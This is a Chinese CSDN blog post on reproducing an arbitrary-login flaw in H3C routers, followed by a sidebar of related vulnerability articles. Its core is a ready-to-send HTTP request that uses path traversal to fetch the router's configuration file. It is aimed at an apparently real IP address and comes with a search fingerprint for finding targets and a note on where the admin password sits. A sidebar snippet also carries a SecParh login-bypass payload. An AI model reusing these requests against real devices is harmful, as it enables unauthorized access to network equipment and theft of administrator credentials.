h3c多系列路由器存在任意用户登录漏洞

最新推荐文章于 2024-02-19 08:31:31 发布
最新推荐文章于 2024-02-19 08:31:31 发布
阅读量2.3k 收藏 6
点赞数 1
分类专栏: 漏洞复现 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49025459/article/details/132534740
版权

该文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。

漏洞复现

app.name="H3C Router Management"

根据根据系统名修改payload

发送请求包,获取管理员账号密码。

GET /userLogin.asp/../actionpolicy_status/../ER2200G2.cfg HTTP/1.1
Host: 110.167.126.234:8848
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

 

 密码就在vtypasswd之后,账户一般都是admin。

 

仲瑿
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
【1day】复现H3C系列路由器敏感信息泄露漏洞
记录并分享学习安全的知识点..
09-14 1085
H3C系列路由器是适用于不同企业和场景需求的路由器产品线,提供了多种功能和特点,包括多种WAN接口、VPN、安全策略、高可靠性、高性能、高速转发、灵活扩展、多种无线接入技术等。H3C系列路由器存在敏感信息泄露漏洞,攻击者可以获取重要敏感信息,包括管理员密码,从而登录后台,进行下一步操作。
H3C路由器 ER G2G3系列路由器.zip
02-28
目录 SOHO路由&&Mm无线常见问题排查pptx H3CSRG2&G3列路由器日常维护指导书pdf H3Cmini列无线产量培训V2.0.pptx H3CER列路器产量培训vl0归档pptx H3CERG3列路由器用户手册6W02正文Pdf H3CERG3系列路由器用户TA4Q602整本手册pdf H3CERG3系列路由器典型配置案集G00-整本手pdf H3CERHMG2&G3MIB companion.doc ER-ERG2系列产量培训pptx
漏洞复现】H3C Web网管登录任意文件读取漏洞
晚风不及你
02-18 991
H3C设备的Web网管是指H3C公司生产的网络设备的网络管理界面。它可以通过Web浏览器进行访问和操作,以实现对网络设备的配置、管理和监控。
H3C系列路由器配置指导手册汇总集.rar
08-04
H3CCR16000系列核心路由器配置指导chm H3CCR16000-F路由器配置指导pdf H3CCR16000X核心路由器配置指导pdf H3CCR19000核心路由器配置指导chm H3CMSR系列路由器配置指导(7)chm H3CRA系列路由器主机配置指导pdf H3CSR6600SR6600-X路由器配置指导chm H3CSR6600F路由器配置指导pdf H3CSR8800万兆核心路由器配置指导chm H3CSR8800-F路由器配置指导chm H3CSR8800-X路由器配置指导chm
H3C路由器忘记密码处理方法
08-30
忘记密码的出来方法,很容易学会。H3C路由器忘记密码处理方法
H3C系列路由器产品维护指导书汇总集.rar
02-13
目录: 01 H3C 万兆核心路由器CR16000 基本维护V1.0 02 H3C 万兆核心路由器CR16000-F SR8800-F基本维护 03 H3C 万兆核心路由器SR8800 基本维护V4.0 04 H3C 万兆核心路由器SR8800-X SR8800-X-S基本维护 05 H3C 万兆核心路由器SR8800产品 V3R7 特性变更(V2.0) 06 MSR3G-4G开局与应用维护指导 07 MSR系列路由器-常见问题排查V4.0 08 H3C LA66系列路由器日常维护指导书 09 IP_RAN产品维护指导 10 LTE-Fi产品开局与维护指导 11 SR66维护与故障处理
H3C ER G2系列路由器敏感信息泄露漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
09-20 1685
H3C ER2200G2是H3C推出的新一代高性能企业级路由器,采用全新硬件架构、具备丰富的软件功能、支持全面的安全策略。定位于以太网/光纤/xDSL接入的中小商业市场(SMB),可部署于需要高速Internet接入的政府机构、中小企业、餐饮连锁、酒店、学校、医院、网吧等网络环境。H3C ER G2系列版本存在敏感信息泄露漏洞。攻击者通过actionpolicy_status跳转别的接口,利用该漏洞访问ER2200G2.cfg文件。
关于H3C路由器漏洞的情况说明
weixin_44106034的博客
10-19 1939
ER3108G-CN,ER3108GW-CN,ER2100-CN,ER2100V2,ER2100n,ER2210C-CN,ER3100-CN,ER3260-CN,ER5100-CN,ER5200-CN,ER6300-CN,ER8300-CN,ER3200-CN已停止维护。H3C MC101/MC102/MC500/H100/H100-EI/H200/H200-EI、H3C X3路由器H3C Magic R1/R100/B1/B0/B3/M2都已经停止维护。
H3C SecParh堡垒机任意用户登录与远程执行代码漏洞
剁椒鱼头没剁椒的博客
02-02 3246
这里确实成功登录上去了,若设定三权的话,可能存在把admin用户设定为类似与这里的审计管理员,那么就需要测试是否能够跳转到操作管理员或者其它的一些管理员账号上去。这里就不再深入测试,只是提供一个思路。我使用火狐浏览器,我访问后就自动将信息进行下载,不过也有浏览器直接跳转界面的也行,都能够看到。
H3C SecParh堡垒机 data_provider.php 远程命令执行漏洞
Adminxe的博客
07-02 789
0x00 前言 H3C SecParh堡垒机 data_provider.php 存在远程命令执行漏洞,攻击者通过任意用户登录或者账号密码进入后台就可以构造特殊的请求执行命令,漏洞类似于齐治堡垒机 0x01 影响范围 H3C SecParh堡垒机 0x02 漏洞复现 先通过任意用户登录获取Cookie /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(1..
H3C iMC 存在远程命令执行漏洞
nnn2188185的博客
04-22 3160
H3C Intelligent Management Center(以下简称 H3C iMC)是一款业务智能管理平台。 H3C Intelligent Management Center 存在命令执行漏洞。攻击者可利用漏洞通过构造特殊的请求造成远程命令执行。
H3C系列路由器产品配置指导书汇总集.rar
08-15
08 H3C MSR系列开放多业务路由器 09 H3C MSR WiNet智慧路由器网关 10 H3C GR系列路由器 11 H3C Mini系列无线路由器 12 H3C NR系列企业级无线宽带路由器 13 LA无线网关 14 H3C MER系列路由器 15 H3C ER G3系列路由器
H3C ER G2系列路由器用户手册
04-11
H3C ER G2 系列高性能企业级路由器用户手册,整本手册
漏洞复现】H3C 路由器系列信息泄露漏洞
晚风不及你
02-19 1310
H3C路由器是一款高性能的路由器产品,具有稳定的性能和丰富的功能。它采用了先进的路由技术和安全机制,可以满足不同用户的需求,广泛应用于企业、运营商和数据中心等领域。
HG532e路由器远程命令执行漏洞复现
qq_41326328的博客
09-29 2208
最近一直在复现关于路由器漏洞,前俩天复现了D-link的某款溢出漏洞,感觉做起来有很多坑,一般都是搭建环境造成的坑,在这以华为HG532e的远程命令执行的漏洞做出详细的步骤,供大家参考。我是个IOT新手,发文章一来是想把自己的实验记录一下,二来能够分享和交流一下技术和经验。
H3C-ER3108GW的毛病
chengzaquan4642的博客
08-19 2232
一大早网络异常,发现一个无线路由器是dhcp的,而上级路由也是dhcp,导致有PC占用了路由器的Ip。 而我们的路由是H3C-ER3108GW,非常坑爹的说,谁用谁知道,你点按钮都不给你跳出来!只能使用IE浏览器,而我是mac,mac如何使用IE浏览器?刚好safair的开发选项中有个用户代...
H3C SecParh堡垒机任意用户登录
LiBai'S BLOG
12-29 6738
漏洞描述: H3C SecParh堡垒机 get_detail_view.php 存在任意用户登录漏洞 与齐治堡垒机出现的漏洞相似 漏洞复现: POC: /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin ...
漏洞复现 || H3C iMC 存在远程命令执行
失心少年
07-07 826
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!H3C Intelligent Management Center(以下简称 H3C iMC)是一款业务智能管理平台。攻击者可利用漏洞通过构造特殊的请求造成远程命令执行。
漏洞复现】H3C路由器信息泄露任意用户登录
失心少年
09-06 2076
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!1.利用GET发送如下请求包,获取管理员账号密码(ER3100 根据web界面的标题修改)通过访问特地址得到密码可进行登录。
h3c路由器添加用户
最新发布
03-05
H3C路由器上添加用户可以通过以下步骤完成: 1. 进入路由器的管理界面,通常通过浏览器访问路由器的管理IP地址来进行配置。 2. 在管理界面中找到用户管理或者用户权限相关的选项,一般位于系统设置或者安全设置等菜单下。 3. 在用户管理界面中,点击添加用户或者新建用户的按钮。 4. 输入要添加的用户的用户名和密码,并设置用户的权限级别。权限级别可以根据需要设置为管理员、操作员或者普通用户等级别。 5. 确认输入无误后,点击保存或者应用按钮,完成用户添加过程。 请注意,在进行用户添加操作时,需要确保你有足够的权限来进行此操作。如果你不确定如何进行操作,建议参考H3C路由器的用户手册或者联系H3C官方技术支持获取帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

仲瑿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值